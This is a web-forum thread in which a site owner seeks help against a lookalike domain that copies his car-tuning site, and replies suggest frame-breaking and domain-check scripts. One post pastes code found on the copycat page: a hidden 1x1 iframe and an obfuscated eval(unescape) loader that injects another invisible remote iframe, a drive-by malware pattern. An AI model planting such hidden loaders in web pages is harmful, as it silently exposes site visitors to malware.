Results 1 to 11 of 11
  1. #1

    Unhappy My site was iFramed "stolen" - Please help

    Hi again,

    Following some other thread I had in here, I finally managed to find what hapened, still I don't know how to solve it.

    I run www.cartuningcentral.com for quite some time now, and a couple of days ago there was this little funny guy that decided to register www.cartuningcnt.com and iFrame my site there!

    How can I block this thing?

  2. #2
    I'm not too great with JavaScript, but try inserting this somewhere in your page:

    Code:
    <script type="text/javascript" charset="utf-8">
    	if (parent!= window) window.location = "http://www.google.com"; 
    </script>
    Again, I am not 100% sure this will help in your case, but I did a quick example on my local server and it seems to work fine.

  3. #3
    Join Date
    Aug 2002
    Location
    Superior, CO, USA
    Posts
    633
    I don't think it was put into an iframe. If you:

    Code:
    telnet www.cartuningcnt.com  80
    Trying 70.85.236.34...
    Connected to cartuningcnt.com.
    Escape character is '^]'.
    GET / HTTP/1.1
    Host: www.cartuningcnt.com
    You'll see that there is no I frame - the site has likely had a "wget -r" done on it. The only thing he's iframe'ing is build.airhouse.su.

    He's hosting with The Planet. I'd contact them and let them know he ripped your site.
    Need Java help? Want to help people who do? Sit down with a cup of Java at the hotjoe forums.

  4. #4
    Join Date
    Sep 2006
    Location
    Indiana
    Posts
    166
    Frame breaking scripts are a great option. 'Cept if it were me I'd make it break to your site instead of google...might as well get free traffic.

    You could also try detecting the referrer and if it is the iframer's site give him useless content, ads, or a message about stealing.
    [Lurking Glass] <- Not a webhost.

  5. #5
    Join Date
    Sep 2006
    Location
    Indiana
    Posts
    166
    Ah, yep. Not an iframe.

    Other than contacting his host there's a couple things to do.

    1. Block requests from his IP.

    2. Add an obfuscated script to your site that checks what the URL is, and if it isn't on your domain, redirect to yours. Much like frame breaking. This assumes his is actively grabbing changes to the site or reading it real-time though.
    [Lurking Glass] <- Not a webhost.

  6. #6
    Quote Originally Posted by eviltechie View Post

    2. Add an obfuscated script to your site that checks what the URL is, and if it isn't on your domain, redirect to yours. Much like frame breaking. This assumes his is actively grabbing changes to the site or reading it real-time though.
    Can you let me know how to do it please?

    After comparing both page sources, I am pretty sure it's an iFrame (I might be wrong)

    What's this on his site?

    Code:
    <iframe src='http://195.93.218.29/lb/m1.php' width=1 height=1></iframe>
    <script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%74%72%79%2d%63%6f%75%6e%74%2e%6e%65%74%2f%73%74%72%6f%6e%67%2f%30%37%37%2f%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>
    Last edited by Jreiss; 04-22-2008 at 01:28 PM.

  7. #7
    OK.. So if you're pretty sure, then there's an easy way to test if it's really an iFrame. Try a frame breaking script. (You should probably use one more complex than my example).

    And that codebox is breaking the layout of this page..

    By the way, since you've linked to his site directly, he'll probably know you're trying to stop him, if he's checking his referrals. (And looks into it)

    ----

    Just so you don't actually try, it's not an iFrame. He probably just used wget -mk on your entire site.
    Last edited by jw0ollard; 04-22-2008 at 01:39 PM.

  8. #8
    Join Date
    Sep 2006
    Location
    Indiana
    Posts
    166
    Okay, here's an example of the type of script I was mentioning...that only allows the site to appear on your domain.

    Code:
    <script language="javascript" type="text/javascript">
    function verifydomain() {
    var mydomain = "www.cartuni" + "ngcentral.com";
    var thisurl = document.location.href;
    var domainparts = thisurl.split("/");
    if (mydomain != domainparts[2]) {
    document.location.href = 'http://' + mydomain;
    }
    }
    verifydomain(); 
    </script>
    Then run it through something like this: http://scriptasylum.com/tutorials/en...t_encoder.html

    That'll help prevent the guys URL replacement from replacing the URL in the script.
    [Lurking Glass] <- Not a webhost.

  9. #9
    @eviltechie

    Man, I guess this is working!!!

    So far so good, I'll check my logs for a while now.

    I'll be PM'ing you after.

  10. #10
    Join Date
    Sep 2006
    Location
    Indiana
    Posts
    166
    Yeah, it does appear to be working. I hit his site and was redirected to yours.

    It is possible that he'll start trying to strip out your script when he steals the page. And, if he starts that, you can change the names of the variables in the script, the spacing/structure etc and re-encode it. That'll likely get by him for awhile. But it'd still be good to work on his host, and get him shut down for good.

    Another option script wise is to make it a JS file and load it. Then use URL rewriting to make all .js files with filenames consisting entirely of numbers load the filename you gave your JS file. Then in your PHP, generate random numerical filenames on every page load. That'd make it a huge pain to block...unless he got real sophisticated.

    The scripts are a good temporary solution though, till his host acts.
    [Lurking Glass] <- Not a webhost.

  11. #11
    And now I have blocked it.
    Still looking good, but I am implementing preventive measures.

    Thx a damn lot to everyone!

    eviltechie! Sending PM now.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •